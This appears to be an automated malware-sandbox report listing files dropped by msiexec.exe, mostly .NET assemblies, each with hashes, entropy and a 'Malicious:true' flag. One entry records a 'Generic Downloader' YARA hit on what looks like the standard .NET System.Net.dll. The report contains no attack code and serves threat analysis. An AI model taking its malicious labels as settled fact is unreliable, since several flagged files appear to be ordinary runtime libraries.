                                                                                                                                                                                                                                        SHA1:AF1B3BC9BEE01FBF75759F17D57AF109F7FCABDA
                                                                                                                                                                                                                                        SHA-256:25F850EBE1D79A8DE785C29DAB88CC21417501186832D70FE68293993E2F6889
                                                                                                                                                                                                                                        SHA-512:25151F701606379FCD726C3B310EB52388E82943D1418467D9B23AEC48F00B43021E0BFEEC305F88778B0DDD9BB3C00FBF9CEB6F400317EE39072001925D6BFA
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (console) x86-64 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):82208
                                                                                                                                                                                                                                        Entropy (8bit):6.572626025407632
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:1536:Kkm1ufOCUCV+/pNDCJ0gRlK03B5YjbwtHUfsCN7s6+gzWWzW:Kkm1DCUCV+hND8K0R5YjbwBCx+uhq
                                                                                                                                                                                                                                        MD5:6A08AEF4C00719F2E1642A90887C9A74
                                                                                                                                                                                                                                        SHA1:52903122F8643AB7D922560223D2472F890C4B1E
                                                                                                                                                                                                                                        SHA-256:95B052CC609C7F779C4A2C30461A81175573F4CB1B49506C7C3B29DF260D6D46
                                                                                                                                                                                                                                        SHA-512:223FAAB78C2E8BB6807DE872E82BCB0624D09B1992D7B274E22BA96E66F67132AF0C6F090196B1EE51AEBA25A83DD8EB72EA6C9A87F115A3DFD61AB371FBB890
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (console) x86-64 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):1807128
                                                                                                                                                                                                                                        Entropy (8bit):6.72398533519753
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:24576:W2yyqByNNh+gDoiXDeR57e6AnUIVWUtQ+JSy6H7BWxkUvp:WYqcNDo+DeR57e66UIVWiRa7Oh
                                                                                                                                                                                                                                        MD5:503A05E956BCEDBB5E3FF1A6DAF2EA8D
                                                                                                                                                                                                                                        SHA1:F4E123ECCE83D4CC6E69304A8FA86D32577CC903
                                                                                                                                                                                                                                        SHA-256:C528A716B9BF682A7DDC56D69A55D71CE3C73CD113814C73988E376E2FCD64C2
                                                                                                                                                                                                                                        SHA-512:86BEA623426D2E79704C801B2535A48B46F7A38C6630A6F6C5E5211E6894784ECBA504BF91504902751A062051F530B4E65CF129584C1CA36A16C7308F9B5CED
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (console) x86-64 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):639152
                                                                                                                                                                                                                                        Entropy (8bit):6.673308999442195
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:12288:kskz/Mc4M2+yHm16kUt3p2YWjAp0FTRONXRdR9Rk3jQz9BLJq:kskH2E16KYWbIWkzjg
                                                                                                                                                                                                                                        MD5:0BD4CC6E18D3B09A80B3453BF35F36E7
                                                                                                                                                                                                                                        SHA1:7345C78FD49F71ABB6FACF5F20B65A3175459924
                                                                                                                                                                                                                                        SHA-256:EF574BE2C5237DD729950EE8817977C3160B217E27E16982AB2BDF8084DABBB6
                                                                                                                                                                                                                                        SHA-512:24C97828BF074D23124C4E34428A6E54B0E66B05EB73F4F4F28CDB1B4107716930144D3C2C2EA03190982C742989DCFE4DB2BEE65E0149E5EE519EE3E19FC759
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (console) x86-64 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):552096
                                                                                                                                                                                                                                        Entropy (8bit):6.681059761488281
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:12288:Llpsa0qYPGZVwldB8dhpm20B2APiOLlbH5GPCWZFdYHa4s:Lli7big2joWafs
                                                                                                                                                                                                                                        MD5:2DB5CD9B802280171D198A4F374B8A3D
                                                                                                                                                                                                                                        SHA1:E16E86316C521B3E37C90FA409B9E30405CC7AAD
                                                                                                                                                                                                                                        SHA-256:42E4CAF90ADE0509F673AED417AC59900170063B2FB40F456EA910DEA16ECB7D
                                                                                                                                                                                                                                        SHA-512:861222A8BBF7A286D00CC2F99553BDE3B465789179FB1371663929B2591BB4392C73E37DBBEBFBD26B37EE27E8567ED197161DEC646B39DB8BAB1299CF0A0700
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
Process:C:\Windows\System32\msiexec.exe
File Type:PE32+ executable (DLL) (console) x86-64 Mono/.Net assembly, for MS Windows
Category:dropped
Size (bytes):101144
Entropy (8bit):6.587604226793615
Encrypted:false
Malicious:true
Reputation:unknown
Process:C:\Windows\System32\msiexec.exe
File Type:PE32+ executable (DLL) (console) x86-64 Mono/.Net assembly, for MS Windows
Category:dropped
Size (bytes):150688
Entropy (8bit):6.572736787870477
Encrypted:false
Malicious:true
Reputation:unknown
Process:C:\Windows\System32\msiexec.exe
File Type:PE32+ executable (DLL) (console) x86-64 Mono/.Net assembly, for MS Windows
Category:dropped
Size (bytes):79008
Entropy (8bit):6.583609106071422
Encrypted:false
Malicious:true
Reputation:unknown
Process:C:\Windows\System32\msiexec.exe
File Type:PE32+ executable (DLL) (console) x86-64 Mono/.Net assembly, for MS Windows
Category:dropped
Size (bytes):214296
Entropy (8bit):6.693940725784127
Encrypted:false
Malicious:true
Reputation:unknown
Process:C:\Windows\System32\msiexec.exe
File Type:PE32+ executable (DLL) (console) x86-64 Mono/.Net assembly, for MS Windows
Category:dropped
Size (bytes):293552
Entropy (8bit):6.63463896794632
Encrypted:false
Malicious:true
Reputation:unknown
Process:C:\Windows\System32\msiexec.exe
File Type:PE32+ executable (DLL) (console) x86-64 Mono/.Net assembly, for MS Windows
Category:dropped
Size (bytes):349464
Entropy (8bit):6.6253757788002785
Encrypted:false
Malicious:true
Reputation:unknown
Process:C:\Windows\System32\msiexec.exe
File Type:PE32+ executable (DLL) (console) x86-64 Mono/.Net assembly, for MS Windows
Category:dropped
Size (bytes):685344
Entropy (8bit):6.824608271687778
Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:12288:Mi+V+ZiHKzLkQ6kMIUMpygx3NL3dvwCvHq3L/Zg4h:MimHKz1fMOM
                                                                                                                                                                                                                                        MD5:AA0FCB794B32BBBA9813D7FEBBFD32C5
                                                                                                                                                                                                                                        SHA1:4AA0AF3D611330CB14EFC72FE803F116150820C7
                                                                                                                                                                                                                                        SHA-256:673BFFFB75840767ED7EBAB2B5DC8AD9134AE03DB4DAE13525C34AD0259FA4DE
                                                                                                                                                                                                                                        SHA-512:2628BD7D9BAB6871E1196F9B1380FC1ACD4DDE445F9EECAF7EAB7D7913EE11FCADE1BBA6741D8F7D5E939043DD36CB79112EAB70C953D579D51E34C309A0520E
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (console) x86-64 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):37024
                                                                                                                                                                                                                                        Entropy (8bit):6.496750745453374
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:nW+mFWAN7A98x33dWh8noYSWxRyOM9P3x8rI0vKnfrjRYFSlxgdg3a2myQJN29RV:8NKyM2y37WAD9wggLsgbjWFCl7ts89zA
                                                                                                                                                                                                                                        MD5:3301E5143564ED78720D0F03612F499A
                                                                                                                                                                                                                                        SHA1:FDC810CFC491FFF116B5F37DE1BEC78EE34598F8
                                                                                                                                                                                                                                        SHA-256:15798792F8BAAB0B1BFCBD8466C791A624A1796C6A9ABDF9F60771D6094E69B4
                                                                                                                                                                                                                                        SHA-512:E6BF1D68D3CB79ACFDE091350203B27B2D8148E3369A1A382EE727210D4A3F44818022F9244218D009B01BAA63580D12C05FCCE9F3DCD3077967A606C85D500D
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (console) x86-64 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):506528
                                                                                                                                                                                                                                        Entropy (8bit):6.740058323843262
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:6144:TZ7w8ky6SctjxnyBDtnTDiL1h10I+nzL9wRopG+t+dRk4p7C:TZ7GyJctjxyBDhizNoA+t+dRX7C
                                                                                                                                                                                                                                        MD5:BB51E0D392A7FD7D7507CD4BC14C476D
                                                                                                                                                                                                                                        SHA1:22882A4BFF03922C5D2CC202831103AC85E8E5D9
                                                                                                                                                                                                                                        SHA-256:1BFA1A6A66D84EF5966FBA95C19BCE5E9F8D5FE51939902B9730FB5897AF125C
                                                                                                                                                                                                                                        SHA-512:EC89187EF407EBBA2A3CA5E35A746919CB8446E47F698F75514B198A5AE35ACF454A0904A45463D843D1480290E372D1D3FE2B972B421DFA420EC53C02871E1F
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (console) x86-64 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):166560
                                                                                                                                                                                                                                        Entropy (8bit):6.646097951171125
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3072:Joi5C2iVJp9C2Mcz7qucR2iVY3qwJhliW3EMluskR2+8bICbOc:ai5C2sJrbMczOucR2lSskf8bIRc
                                                                                                                                                                                                                                        MD5:B060AEEE1F03574C9B567E1B7F2F4741
                                                                                                                                                                                                                                        SHA1:BBD28613E265B04047406B9149524DCC0B2CEA0A
                                                                                                                                                                                                                                        SHA-256:893512032A693DBA282A2C9A7A8D95A64D8099C267B62B868755FBB50A36AA5E
                                                                                                                                                                                                                                        SHA-512:5C3922E47AC5D24EE3B5BB8409D9AA0AFCFFA40F73A434ABAFB8AE7AFE42E06EABA3A81F79684F9BEC5589CA9F2CE09D67119D2C4BBFEA2819E8194360CEC130
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (console) x86-64 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):60704
                                                                                                                                                                                                                                        Entropy (8bit):6.534824454137025
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:1536:jNfR5v+6SDbVXWTGEV3VulTTTTTTTTTTTTTTTTTTTTTTTTT0SWHzh:jH5KpXqGQ3VRSY9
                                                                                                                                                                                                                                        MD5:B1129490D0C33F7EA01D0366F8FEE431
                                                                                                                                                                                                                                        SHA1:B180A00E3A851C5E741D7ABAA58B1343FBAF839F
                                                                                                                                                                                                                                        SHA-256:6BA0F2C2C9FF2031956E15DFB376B19C54358CE3D3FE95BD1003EA026F908350
                                                                                                                                                                                                                                        SHA-512:980890ECF3D616629D5A9021CB6B5A3871A8E5948EF976D61EAF863C1856C933904517679E2F94E7E43E615174C8157570154A787CE1B6F7E6D26618A67E450E
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (console) x86-64 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):31904
                                                                                                                                                                                                                                        Entropy (8bit):6.54527100441263
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:Q3WpNwWK3k/IKgZ3cZq2VUi6VGt1QWKlL/95a1NqOMUViKsYA6VFHRN7YBmo8R9f:QQqk/IdZx2Vd1HITUIKsFCl+moQ9zT
                                                                                                                                                                                                                                        MD5:BDD17CBF5A46DC3D656C2C730169A013
                                                                                                                                                                                                                                        SHA1:EE59429AEAC62F69EE4B13F79B2091847F5791B3
                                                                                                                                                                                                                                        SHA-256:AB719DBCC893F90B0FAC078E733707EA8B8B8457CD52D40D1CA60BCB1C0FF283
                                                                                                                                                                                                                                        SHA-512:4FBF49DD2E521C140828AABD69E90BB655E0ABC481A092966B64473D375A8B5A1E7038FF43B6E8310611D7812A6748772BCCA1AEC2DD818ED8134A6167B75F71
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (console) x86-64 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):76568
                                                                                                                                                                                                                                        Entropy (8bit):6.486879247180926
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:1536:e855wMIHHZGtiwpdI3OJckDDjH49YLOXCvzlchIbIJQ4zUWdC4dezF5g:P5ynwtxpS3a5DDjY9YLNblchIMrUCIPg
                                                                                                                                                                                                                                        MD5:3EDC4F4238DD043E45438DA61B13EA20
                                                                                                                                                                                                                                        SHA1:6133535D352BC23A25D82BB91DEBB7314BF09D8D
                                                                                                                                                                                                                                        SHA-256:022911160CB8430C2BC61076EADE816B739B410A3C677775FAC1AABEC3EE6193
                                                                                                                                                                                                                                        SHA-512:908512481F730F93BC7AFC3352356B99040F0A2B34980475B7DEFE38BFA167EF62349D1CCBD8692460F63DB684413197F2EDD156DAB9E319812A2532F8ED6FE7
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (console) x86-64 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):182040
                                                                                                                                                                                                                                        Entropy (8bit):6.636679003445195
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):18080
                                                                                                                                                                                                                                        Entropy (8bit):6.564696056239549
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Yara Hits:
                                                                                                                                                                                                                                        • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Net.dll, Author: Joe Security
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):16032
                                                                                                                                                                                                                                        Entropy (8bit):6.687048412668527
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):16136
                                                                                                                                                                                                                                        Entropy (8bit):6.697117344335608
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (console) x86-64 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):91296
                                                                                                                                                                                                                                        Entropy (8bit):6.552192386026593
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (console) x86-64 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):10637576
                                                                                                                                                                                                                                        Entropy (8bit):6.834783559373698
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (console) x86-64 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):2077472
                                                                                                                                                                                                                                        Entropy (8bit):6.72870931628793
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (console) x86-64 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):252576
                                                                                                                                                                                                                                        Entropy (8bit):6.802013587081938
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:6144:yp8ZfzHkVNCVweEiMw8lDw3ccZejsMMNt:yY7EVNveRqlDQccQjsRNt
                                                                                                                                                                                                                                        MD5:1F2700BAD871C050F72716C0CAFF7458
                                                                                                                                                                                                                                        SHA1:B2998EA702ADF8EE08494E33D89EE03816BB74E7
                                                                                                                                                                                                                                        SHA-256:9DEDF16199CD1080BB1E13698DC8CE32F2812C793B08454BC90B73A9035E4943
                                                                                                                                                                                                                                        SHA-512:99C9BC15B2CA677A5A6C963C81AF4B20E6D2128C0A117C3D6D23C6FBBB0A2616704682A61AEF7F9C5CE350114DC9669F993495D0F940B2115025D63318DD72C6
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (console) x86-64 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):405272
                                                                                                                                                                                                                                        Entropy (8bit):6.713111186922785
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:6144:03P9cNr3NWeN35BpICdwtH/lKPmSZpcHMp3/:03uNr9WG1itH/G1ZpcHe
                                                                                                                                                                                                                                        MD5:1EBEFB503EB38EF1D4A87FE02DC730AA
                                                                                                                                                                                                                                        SHA1:CA95A54B131CD0E6F8CD0606068C1902F5631B6F
                                                                                                                                                                                                                                        SHA-256:0B015273A1AC4FE3C25A248E91ABD4D10C76D70242C1DCAE45EA2BD9402B46D1
                                                                                                                                                                                                                                        SHA-512:DC311F78C2E91C22B9921E6B11D6B2CCDB285E22ADC8A35071BFF4C6461C218A0C6F151256A88359DE0C1DD8D142FA6FF6174D5CE8E7B0A93634EE90F48F71C4
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (console) x86-64 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):8505608
                                                                                                                                                                                                                                        Entropy (8bit):6.821394087878173
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:98304:04wrkcWo4NZeOfTZy0TaFqZlHX/UEewQbFo:RcGNZ1fTZFYQPjenb+
                                                                                                                                                                                                                                        MD5:43EC26D02606E233E8B10785D7B8B40C
                                                                                                                                                                                                                                        SHA1:478404CC0542C7B7DB249B9913CD1094D0A072D7
                                                                                                                                                                                                                                        SHA-256:11911797EA424D8103033A2D1D3D7352D92A7ADBF7297F91BDAD1D7918CDA122
                                                                                                                                                                                                                                        SHA-512:4859DBDD96AB539BB0929B3829110FABCF4D5DBEFA22729671E488258992CFA91B5BCF4BFCF1D3EA00CA78C4A19FEA7924F4862A3EFDA392FFD80B4033AA81E8
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (console) x86-64 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):66208
                                                                                                                                                                                                                                        Entropy (8bit):6.5748535239611074
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:1536:zlGq66P0kymbnA0be+s8cu5BimUxbIuKmCinzk:zlx6URymbAiy8Bimx9mCIo
                                                                                                                                                                                                                                        MD5:9795FA4479E874973EBC95DB710F5AE7
                                                                                                                                                                                                                                        SHA1:710B8C7503ABC1DEEB1ABFEAD100043EA8E84CC1
                                                                                                                                                                                                                                        SHA-256:F20CADA99D1CCEE74B82670E3987372EADBC3DA3F87BA5AFD4203262E79463C9
                                                                                                                                                                                                                                        SHA-512:9D55902EB4E3C91BEC6264BA6B8BAECCF27D04136CFE6A2854A1AC9B4795F418D22FB8C2B120709AFE3610FF67C6328EEBE80A288F1CE127BDB8C840056575FD
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):16032
                                                                                                                                                                                                                                        Entropy (8bit):6.718453492542051
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:umLIkWVhUW3YA6VFHRN7TV/6fR9z+Arlutl+P:RL6JFCli9zhrlutlU
                                                                                                                                                                                                                                        MD5:33BB83C0329A3AA6508C3107B69BCB3F
                                                                                                                                                                                                                                        SHA1:CCF12D70AD543047A3B1B5C4AD6B9E9D146E3E93
                                                                                                                                                                                                                                        SHA-256:946DC1A1F9C330FC997ACD483DBAE7526850E36DBDB7BDCEC9AB641EC88F6177
                                                                                                                                                                                                                                        SHA-512:9ACCEBFB3E264AF66739D80966C49283DB1312ABA6E322C928F34FD946A304E18BEEDC94BD1D1222DAED8E82643C7E253CDF495FC5F835D1D5AAE8D78B6A0F0C
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):16152
                                                                                                                                                                                                                                        Entropy (8bit):6.716289561025598
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:pBAHj3OWxuVJWcX6HRN7L8h9R9zmwjSiD:+UZW4J9zLjSiD
                                                                                                                                                                                                                                        MD5:3BD0D0B84763138671CFDAAF0E86F9AF
                                                                                                                                                                                                                                        SHA1:40464810F0AA8A41FC29726B67D10C5A88566449
                                                                                                                                                                                                                                        SHA-256:287456D6B98567E5B329B69E533EC9B1D41AD9B5572913261A20004CECD8C594
                                                                                                                                                                                                                                        SHA-512:B7D55DCF369A632670023D92B4E07A931B1B0D5F341D7DD4300D8C3791C994ECE146B64DB442B4C72E1E418D281B92315BB386AF9C23CF145B653189E35C55B0
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):16032
                                                                                                                                                                                                                                        Entropy (8bit):6.7217086921406155
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:dlxqu8LLLW6MCRW/3YA6VFHRN7Sq//Bmo8R9zMLgod:Mua2FClVRmoQ9zU
                                                                                                                                                                                                                                        MD5:E148929B3AB3CA72254029548EABF64E
                                                                                                                                                                                                                                        SHA1:F26F7E2EAB2DC37DD5E3E264281A3F2E473C8B87
                                                                                                                                                                                                                                        SHA-256:5BC03566BE47D7C6EF6FC512B1A1665567E3F73A1BAB828263230E932EA4B596
                                                                                                                                                                                                                                        SHA-512:74E5645CA885543CDF7FB589647F2C75FC58C6325D613C8DBFBAA2A145E96B64353358D3691DAE454FBDCD43E4ED42DD187791227EF81A736BD0FF940E441A7D
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):15648
                                                                                                                                                                                                                                        Entropy (8bit):6.802306968215209
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:192:mIBjrxJ+WKbWWvwWxNzx95jmHnhWgN7agWarn8RwX01k9z3A1Zx+XL7Dm4:mgRJ+WKbWWvvX6HRN7zrn9R9zmwjm4
                                                                                                                                                                                                                                        MD5:B8B928549CF3DDC413906F366B00A626
                                                                                                                                                                                                                                        SHA1:416B4D51DBA2452EE7160045FC0E666F52A1D15E
                                                                                                                                                                                                                                        SHA-256:7091A88BC875AE71C24CA697176F0FDB7B80BBA874E3AEDF485EE5C5A99EED8D
                                                                                                                                                                                                                                        SHA-512:3042A1A2F456302877017476E73B8095F1FE4F2B36569140C61A1D6B30597FE42CADCE6147551CA099E0A751BEBE0B2A530381D1EA3CC6A01AF49ADFD5756639
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (console) x86-64 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):1130768
                                                                                                                                                                                                                                        Entropy (8bit):6.716178697279381
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:12288:Ac22hrYDBSZlNmj4C3MgRjfyTMCSTWeW8kJjaJlB9vN10wyQXoVODzty2el+jmZC:AQto0ClR2TMYpO/owh3Dzw2el+jgC
                                                                                                                                                                                                                                        MD5:0AE39983665F6795ECD075CD8E94B776
                                                                                                                                                                                                                                        SHA1:8059256845DB65BBE27EE549FEF7AAC5D984531E
                                                                                                                                                                                                                                        SHA-256:3680BEAEB634F53EB2FADCEDD43FDBE0763F6BD318FB01088DECB4D0441C27DB
                                                                                                                                                                                                                                        SHA-512:62C724C83658EA11321DCBE49F9764E0D5EEBCBD7FC1FAD81B707D8CADFAA6D7BD0B64221532C6681C4A421CF4D89963846F4241A3702826A8233013A05FA838
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):16032
                                                                                                                                                                                                                                        Entropy (8bit):6.753447262554626
                                                                                                                                                                                                                                        Encrypted:false
